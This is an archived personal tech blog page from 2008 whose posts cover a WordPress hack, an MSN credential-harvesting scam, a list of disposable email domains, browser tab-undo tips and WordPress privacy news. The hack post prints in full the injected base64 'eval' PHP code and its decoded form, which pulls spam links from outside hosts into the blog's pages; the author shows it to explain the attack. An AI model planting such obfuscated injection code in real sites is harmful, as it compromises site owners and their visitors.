ss_blog_claim=88d0a386a6277415f42c9ee5561ded98

Archive for the 'Internet' Category

So, I Got Hacked…

Friday, July 4th, 2008 
By Aeriff 1 month, 3 weeks ago Comments
Categories: Internet, Site Related and Wordpress

Or rather, my blog did.

You may remember there were posts floating about on the blogosphere earlier this month pertaining to an exploit in Wordpress 2.5 that individuals were using to inject malicious code into Wordpress files which would include spammy links into your page content. I just discovered that I was a victim of such an attack.

The code was placed in my theme’s header file, base64 encoded just as the article said it would be:
eval(base64_decode('ZnVuY3Rpb24gR2V0Q29udGVudCgpCnsKZXJyb3JfcmVwb3J0aW5nKDApOwokbWlycm9ycz1hcnJheSgiaHR0cDovL2xhcnJ5bWFnaWQuY29tL2xpbmtzLmh0bWwiLCAiaHR0cDovL
2xpbmstb3MuZnJlZWhvc3RpYS5jb20vbGlua3MuaHRtbCIsICJodHRwOi8vYmxvZy5ibHVlZmlyZS50di93cC1jb250ZW50L2xpbmtzLmh0bWwiKTsKZm9yZWFjaCgkbWlycm9ycyBhcyAkayA9PiAkdikKIC
AgIHsKICAgIGlmKCRjb250ZW50PWZpbGVfZ2V0X2NvbnRlbnRzKCR2KSkgYnJlYWs7CiAgICB9CmlmICgkY29udGVudD09IiIpe3JldHVybiAiPCEtLSBsaW5rcyBub3QgZm91bmQgLS0+Ijt9CnJldHVybiA
kY29udGVudDsKfQplY2hvIEdldENvbnRlbnQoKTsK'));

When decoded, the above code just so happens to be:
function GetContent() { error_reporting(0); $mirrors=array("http://larrymagid.com/links.html", "http://link-os.freehostia.com/links.html", "http://blog.bluefire.tv/wp-content/links.html"); foreach($mirrors as $k => $v) { if($content=file_get_contents($v)) break; } if ($content==""){return "";} return $content; } echo GetContent();

For the PHP illiterate among you readers, that code basically says to download a bunch of html files from suspicious sites containing spammy links (Viagra, Cialis, etc. among all else) and input them into my blog’s code.

The issue has now been fixed, and apologies to anyone who was affected by the problem.

Carry on.

If you liked this post, buy me a coffee!

Wordpress 2.5 and IPv6 Fun

Thursday, April 17th, 2008 
By Aeriff 4 months, 1 week ago Comment
Categories: Internet, Miscellaneous and Site Related

I recently upgraded this blog to Wordpress 2.5 and I’m loving it so far. The only shame was that WP Tiger Admin by Steve Smith which I had grown so used to and loved wasn’t compatible with WP2.5, so I went looking for other solutions. Then the wonderful Fluency Admin by Dean Robinson came to my rescue. Dean also makes the awesome Redoable theme which this blog makes use of.

Now, onto the second part of this post: my experiences with IPv6. I recently got an IPv6 address through a Sydney broker and have been experimenting with it since. I got my KAME dancing and I’m awaiting an rdns delegation to be able to use vhosts from afraid.org. Anybody else use IPv6?

If you liked this post, buy me a coffee!

Latest MSN scam records usernames and passwords for spam

Saturday, March 15th, 2008 
By Aeriff 5 months, 2 weeks ago 139 Comments
Categories: Internet and Rant



I just received a rather strange message from a friend on my MSN contact list. Naturally I was suspicious about any messages containing a misspelled .info domain and it seems my suspicions were correct about this one.

The site in question is pooop.info. You visit that site and enter your details at your own risk, although I highly advise that you do not enter your MSN account details anywhere except the Windows Live Messenger sign-in window.

The message I received looked something like this:

PARTY PARTY PARTY

http://[your friend's email account (the part before the @)].pics.pooop.info

The message other users are receiving may vary, so be vigilant.

So what’s the premise of this latest scam? A user basically voluntarily enters their MSN account details (email AND password) on the proviso they’re going to see their friend’s photos. The site is employing the tactic of a social networking site - sign-up to see your friend’s photos and it seems to be working. What most users don’t realise is that the fine print is spelled out clearly in their terms and conditions - which are linked in perfect sight above the sign-in box on the pooop.info website. Here’s the interesting part, their Terms & Conditions:

By filling out this form, you authorize TST Management, Inc to spread the word
about this 100% real and upcomming Messenger Community Site.
You will receive your share of the credit in helping us spread the word. This is a harmless
Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties.
By using our service/website you hereby fully authorize TST Management, Inc to send messages
of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information
you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal
information. Everything we do with your information is disclosed here. If you are under eighteen (18),
you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR
ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT,
DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED
TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination
of the following:
1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time.
You will not be subscribed to anything asking for payment.
This service is made possible by many hours of human effort.

Messenger Profiles, Inc reserves the right to change the terms of use / privacy policy
at any time without notice. To view the latest version of this privacy policy,
simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this
agreement and the terms of use you accepted when you signed up with MSN. You also
understand that by temporarily accessing your msn account, Messenger Profiles, Inc
is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the Republic of Panama.
You expressly consent to the exclusive venue and personal
jurisdiction of the courts located in the Republic of Panama
for any actions arising from or relating to this agreement.

Copyright 2008 TST Management, Inc

I bolded the interesting part - your account may be accessed to spread the word - I believe it should say ‘your account WILL be accessed’ because that’s exactly what’s happening. You may also notice that the T&Cs are governed by the laws of Panama. I’m pretty sure I wouldn’t give my MSN login details to anyone, especially a site in Panama. But alas, here’s where it gets even more interesting. A whois of the site
 reveals the site is actually owned by a group in Hong Kong called Blue China Group, Ltd.

I wanted to see if the site was actually real in it’s claims, so I signed up for a dummy hotmail account… I entered the account details perfectly and what do you know? ‘Login failed’. Where are the photos I was promised? It seems that they’re just harvesting more and more email accounts that most likely be used for spam. They say they’re not a phishing site, and technically they aren’t because the Terms & Conditions plainly state your account will be accessed by TST management (there’s another discrepancy in the company’s details. What ever happened to Panama and the Blue China Group?) but I wish people would just be more careful about what they do with their information.

So spread the word to your friends not to give out their sign-in information to ANYONE, especially pooop.info. Halt the spread of this site and hopefully stop the potentially tens of thousands spam emails that will result from it.

Update: The obvious solution to this problem seems to be to change your account’s password. It seems this harvesting scam is starting to snowball, so be vigilant. Just to reiterate, don’t EVER give out your MSN account’s password. SEE UPDATE #3 BELOW

Update #2: Thanks to the comment of a reader known as ‘d’, another website, srys.info, has been uncovered which is run by the same group of shameless scammers. A whois of the domain yields the same results as the whois of pooop.info. Thanks d!

Update #3: After reading around on the internet, some say this problem is actually a virus (probably a remade version of the ‘Should I put this picture of us on MySpace?’ and then your friend would send you a .zip file). I don’t think it’s a virus at all but I will try to find out. For now, stay vigilant and remind your friends to read this article if they are affected by the problem.

Update #4 (March 26): This article has gotten quite a bit of attention around the internet, including a news story on mess.be. Just an update on the list of sites that you may be linked to include:

rkntbp.info, vnxpkf.info, yzxvsn.info, jcyhzr.info, vnxpkf.info, xrsnbt.info, dytgms.info, qpcbkt.info, yqbzfj.info, yxwzmq.info, psnkcq.info, sxwmkr.info, tqxycj.info, wcmbsj.info, rhqwcp.info, qmnfct.info, rsbkdg.info, zjdgxq.info, mxbpkr.info, xjctsp.info, rhqwcp.info, mgtwdn.info, kfytsj.info, dsbpzg.info, gmnzby.info, dbnyzc.info, jcyhzr.info, dsbpzg.info, dbnyzc.info, bzjnxd.info, zjdgxq.info, qvsgwy.info, cdystp.info, hmybqw.info, yvmjzc.info, vmytks.info, nhcswv.info, ztmrcj.info, wkfbmt.info, fvkgcz.info, zcxrjb.info, jtyqkv.info, xhzsrg.info, hqnxmv.info, srbgxz.info, pghzvq.info, bgpmwr.info, ndkzcy.info, tpyhzx.info, etc…

It seems that most of the info domains now use skaq.info as the main site and are simply just ‘mirroring’ skaq.info (it is the same site just under a different domain). Continue to be wary of such sites.

Update #5 (April 24): So here I am again updating this article because the face of the threat has changed, yet again, in an attempt to trick more users. It seems they’ve started to use more logical domains (as reported by users in the comments) such as imagehosters.info and friendpixer.com. I believe this will catch more users out, so once again I reiterate DO NOT ENTER YOUR ACCOUNT DETAILS ANYWHERE OTHER THAN YOUR MSN CLIENT. I appreciate your updates in the comments on the different sites, etc. Keep them coming! Note some comments are being pushed into the moderation queue as spam - don’t worry, I check these and get them approved as quickly as possible. There is no need to resubmit your comment.

Help to spread the word by Digging this story.

If you liked this post, buy me a coffee!

List of Disposable Email Providers

Monday, January 28th, 2008 
By Aeriff 7 months ago Comments
Categories: Internet

Have you ever wanted a disposable email for signing up to that shady site that you just don’t want to share your email with? A disposable email allows you to create a fake email which forwards any email sent to it to your regular inbox. (Read more at Wikipedia) The list could also be useful for adding to your ‘do not allow registrations from these addresses’ list.

Of course there are ways to bypass this deny list, but excluding the following domains from registering makes it just that little bit harder:

cosmorph.com
slopsbox.com
10minutemail.com
dodgeit.com
dontreg.com
e4ward.com
gishpuppy.com
guerrillamail.com
haltospam.com
jetable.org
kasmail.com
mailexpire.com
wuzupmail.net
willselfdestruct.com
willhackforfood.biz
temporaryinbox.com
tempinbox.com
tempemail.net
spamgourmet.com
spaml.com
spamhole.com
spamfree24.org
spamday.com
spambox.us
spambob.com
sneakemail.com
spookmail.com
hortmail.net
nospamfor.us
nobulk.com
mytrashmail.com
mintemail.com
mailnull.com
mailinator.com
maileater.com
mailexpire.com
kasmail.com

Each provider offers their own pros and cons, so test them out for yourself and find the best one that suits you. Your thoughts on specific providers are welcomed in the comments and If I’ve missed any out from the list, give me a heads up via comments.

If you liked this post, buy me a coffee!

DIY Myspace

Wednesday, November 7th, 2007 
By Aeriff 9 months, 3 weeks ago Comments
Categories: Internet

Ever dreamed of being the next Myspace? Elgg’s here to help fulfill your dreams.

The last few years have seen social networks become the internet’s most popular applications, with sites such as Myspace and Facebook dominating the market. But what if you had the chance to enjoy some of this success too, but haven’t a clue where to start? That’s where Elgg comes in.

Elgg is a PHP-powered script that helps you set up a fully featured social network in your own web space. You’ll need PHP support and a spare MySQL database. While the software’s still in beta, it’s proving to be a robust and stable release.

Why roll-your-own social networking site? In short: control. You maintain absolute control over the look and feel of the whole site, decide which modules to add and which to leave out. You can even change the entire layout of the page template with just a little HTML savvy and some elbow grease.

Why join MySpace when you can be MySpace?

Edit: For those who don’t know their PHP’s from their MySQL’s and such, here’s a guide for getting you underway in the social networking scene using Elgg.

If you liked this post, buy me a coffee!

Captcha Catastrophe

Wednesday, November 7th, 2007 
By Aeriff 9 months, 3 weeks ago Comments
Categories: Internet and Web

They say that sex sells. Spammers just took that phrase one step further.

You’ve got to hand it to spammers. If they’re not creative, then I don’t know what they are because their latest scam is brilliant even if I do say so myself.

For those out there who don’t know what Captchas are, you’ve almost definitely completed one at some point in your travels around the internet. A captcha is a disfigured image, usually containing a word, that aims to prevent spammers from automating actions such as leaving Viagra comments on your blog or email signups.

Captchas have seen widespread success in fulfilling their purpose and the spammers have had to adjust their tactics; and that’s what they’ve done with this latest booby-trap.

But what makes this method so unique? What if I told you that you could watch an attractive woman strip and all you had to do was decipher disfigured images of words? That’s where the deception lies.

They’ve created a game with the concept that you, the user, decipher captcha images and reap the rewards of seeing a woman in ever increasing states of nudity.

So, every time you decipher a captcha you get the added flattery of nudity and the fulfillment that you’ve allowed spammers to place another comment on yet another blog, or better still, set up a free email account which will be used to send hundreds more spam emails to your inbox. Great job.

If you liked this post, buy me a coffee!

Undo For Browsers

Monday, October 15th, 2007 
By Aeriff 10 months, 2 weeks ago Comments
Categories: Internet, Software, Web and Windows

If you’re really long in the tooth, you’ll recall when Microsoft introduced the undo command in Word for DOS. This little piece of bacon-saving magic was one of the great milestones in user-friendly software development.

It’s taken a while for browsers to catch up with the delights of undo. Of course, the need for an undo command only really became pressing once tabbed browsing appeared on the scene. Before that, you could always return to a site during a session using the Back button, or from session to session by using the browser’s history cache. But once we gained the ability to view multiple sites concurrently using tabs, the Back button was no longer sufficient. With multiple sites open, it’s all too easy to close one of those tabs and then realise you need that site open after all.

Opera, not surprisingly, was the first to bring the undo concept to the browser. It gave us the ability to undo a closed tab by pressing Ctrl-Alt-Z. Then it went further and added a multilevel undo in the form of the Trash Can. The Trash Can stores each tab you close during a session, plus every closed popup window. Click the Trash Can at the far right of the Tab Bar and you can open any of these closed items.

Firefox has had tabs all along, but no undo. Due to its support for extensions, though, third-party developers were happy to remedy that omission. A number of extensions provided basic undo functions, all the way from the single-minded Undo Close Tab to the spectacularly all-inclusive Tab Mix Plus.

The folks at Mozilla have since seen the list and in Firefox 2 you can undo a closed tab by pressing Ctrl-Shift-T. If you already used the keyboard shortcut Ctrl-T to open a new tab, that’s particularly easy to remember. If you close a series of tabs, you can reopen each of them by pressing Ctrl-Shift-T repeatedly. It’s a LIFO stack (Last In, First Out), so Firefox will open the most recently closed tab first, then the next most recently closed and so on. Firefox also includes a (less elegantly implemented) version of Opera’s Trash Can: to select from a list of closed tabs, click History —> ‘Recently Closed Tabs’.

Reopening a closed tab also restores that tab’s history, in both Opera and Firefox, so you can browse back though the sites you viewed on that tab.

So where’s the undo closed tab feature in Internet Explorer 7? It’s not there. Microsoft is still playing catch-up with it’s browser.

Up A Notch

Reopening a closed tab is handy, but wouldn’t it be great if you could undo a browser crash or re-display a bunch of sites after you’ve accidentally closed your browser? That’s where crash recovery comes in.

Once again, where Opera leads, the others have followed. Opera will automatically load your last session exactly as it was – all the tabs and all the windows – if you click Tools —> Preferences —> General and from the Startup menu select ‘Continue from last time’. You’ll no longer have to worry about accidentally closing a bunch of tabs.

Firefox has a similar options: go to Tools —> Options —> Main and in the ‘When Firefox starts’ box, select ‘Show my windows from last time’.

Once again, IE 7 doesn’t quite get it right. There is an options to re-display the currently open tabs, but there’s no way to set this to occur automatically. Instead, you have to remember to do it each time.

  1. Open at least two tabs.
  2. Click IE’s close button. A dialog will appear, asking whether you wish to close all tabs.
  3. Click the ‘Show Options’ button.
  4. Tick the ‘Open these the next time I use Internet Explorer’ options and then click ‘Close tabs’.

Firefox and Opera have the ability to recover from a crash. Should your computer or browser crash, the browsers will automatically offer to reload your last session. It’s not fool-proof, but it usually works.

Matching Opera

To match Opera’s graceful undo handling, Firefox and IE 7 both need the help of add-ons. For Firefox, you should install Tab Mix Plus, one of the all-time great Firefox extensions. Tab Mix Plus provides a huge array of tab options, including a right-click ‘closed tabs list’, as well as it’s own highly flexible crash recovery and sessions saver. Once installed, navigate to Tools —> ‘Tab Mix Plus Options’ —> Session to find settings to suit your needs.

For Internet Explorer, there’s IE7Pro. This add-on provides a whole bunch of enhancements for IE, including crash recovery and advanced tab management.

Tips

Tweak Firefox
If you like fiddling under your browser’s bonnet, you can manually tweak Firefox’s session restore and crash recovery settings. Type about:config in the address bar and set the Filter to session. You’ll see all of Firefox’s session-related settings. Double-click a setting to change it.

Edit: Opera users, I haven’t forgotten you! After searching around a little, I’ve found you can also change a plethora of settings using Opera’s opera6.ini. if you’d much rather edit the file from your browser, type about:config or opera:config and you’ll be greeted with a bunch of settings that you can tweak to your heart’s content! More information over at Opera Support.

If you liked this post, buy me a coffee!

Wordpress 2.3 Release Scandal: The Aftermath

Thursday, September 27th, 2007 
By Aeriff 11 months ago Comments
Categories: Internet, Software and Wordpress

After the Internet went crazy over the release of Wordpress 2.3 and with Wordpress 2.4 already on the horizon, plus the scandal that came to light about certain issues as the new release, codenamed Dexter, spying on it’s users; individuals have hit backs with claims such as Matt Mullenweg’s:

As mentioned in our release announcement, the update notification sends your blog URL, plugins, and version info when it checks api.wordpress.org for new and compatible updates. It does not include $_SERVER dumps, or any settings beyond version numbers (for checking compatibility), or your blog name, or your credit card number. We do provide a way of disabling this feature; in fact I link to one of the plugins in the release announcement and in my original response to Morty’s thread.

But it’s not all bad news - some things apparently went right with Wordpress 2.3. This isn’t the first scandal to rock Wordpress. It was previously found that Wordpress ‘intentionally violated Google Adwords TOS to make money‘. This article also just goes to show that even sometimes developers cross the line.

If you’re one of the many who are paranoid about sharing their information, then I suggest grabbing the 2 following plugins: Disable Wordpress version check and Disable Wordpress plugin updates. But don’t think Matt Mullenweg is the bad guy in this situation - some credit must go out to him for linking these plugins in his original posts elsewhere around the internet. If you’re simply fed up with Wordpress and this is the final straw - consider 9 Wordpress alternatives.

I didn’t write this article with the intention of flaming anybody or provoking an argument - I simply want to generate some discussion on the matter.

Your thoughts in the comments.

Technorati Tags: ,

If you liked this post, buy me a coffee!

Wordpress 2.3 Released, Internet Goes Crazy

Wednesday, September 26th, 2007 
By Aeriff 11 months, 1 week ago Comment
Categories: Internet, Site Related and Software

That’s right, Wordpress 2.3 “Dexter” has been released to the interweb. Now usually when there’s a Wordpress upgrade, everyone goes stir crazy and wants to update their blog to the latest and greatest version. But of course, riding on the back of this great news comes scandal - apparently WP 2.3 spies on it’s users. Slashdot has the full lowndown in the previous link, so check it out and let me know your thoughts. I won’t be upgrading in the coming days for the simple reason that Wordpress 2.3 doesn’t play nicely with many current plugins.

If you liked this post, buy me a coffee!

SEO Tip: Choose A Good Domain!

Thursday, April 19th, 2007 
By Aeriff 1 year, 4 months ago Comments
Categories: Internet and Site Related

The worst mistake I’ve made with this blog was not choosing a more appropriate domain name (blame a brain impulse for that).

These should be the steps when making that decision:

  1. Select a niche or core topic for your site.
  2. Clearly define the purpose and goals of your site.
  3. Choose an appropriate domain name.

I think it’s obvious that I missed the boat on all of the steps.

When I started this blog I had no idea what I was going to write about and now that I’ve settled on some topics I’m starting to suffer for it.

Your choice of domain name can be the most important decision you make for your site and can make or break it too.

I’m #1 on Google’s search results page for “forged euphoria”. Surprisingly I’ve actually had a few hits from people looking for this. I have no idea what they expected to find.

Anyway, the reason I’m #1 for that term is because everyone links to this site with the anchor tag “Forged Euphoria”, so naturally I’m up there in the rankings. Problem is this isn’t the term I want to rank high with.

The key is choosing a domain that relates specifically to your niche and has your desired keywords in the title. For example if you were going to start a blog about cars, cars-blog.com or blog-about-cars.com would be two I’d consider using. When people link to you the majority of the time the anchor tag they’d use would be “Cars Blog” or “Blog About Cars”. Having people link to you is great, having them link with relevant keywords in the anchor tag is much much better. If your domain name contains keywords relevant to your niche you force people to link to your site with the exact keywords which will help you get a better search engine ranking.

If you’re thinking of buying a new domain first consider your niche and the purpose of your blog, before you even start throwing around ideas for names. Don’t make my mistake and get stuck trying to make the best of a bad situation.

If you liked this post, buy me a coffee!

August 2008
M T W T F S S
« Jul    
 123
45678910
11121314151617
18192021222324
25262728293031

Last 6 Months

RSS  


Posts (RSS) Posts     Comments (RSS) Comments
 Add to Technorati Favorites


advertisements  


top commentators  


  • sexymonkey (2)
  • n0b (1)
  • L (1)
  • chanx (1)
  • june (1)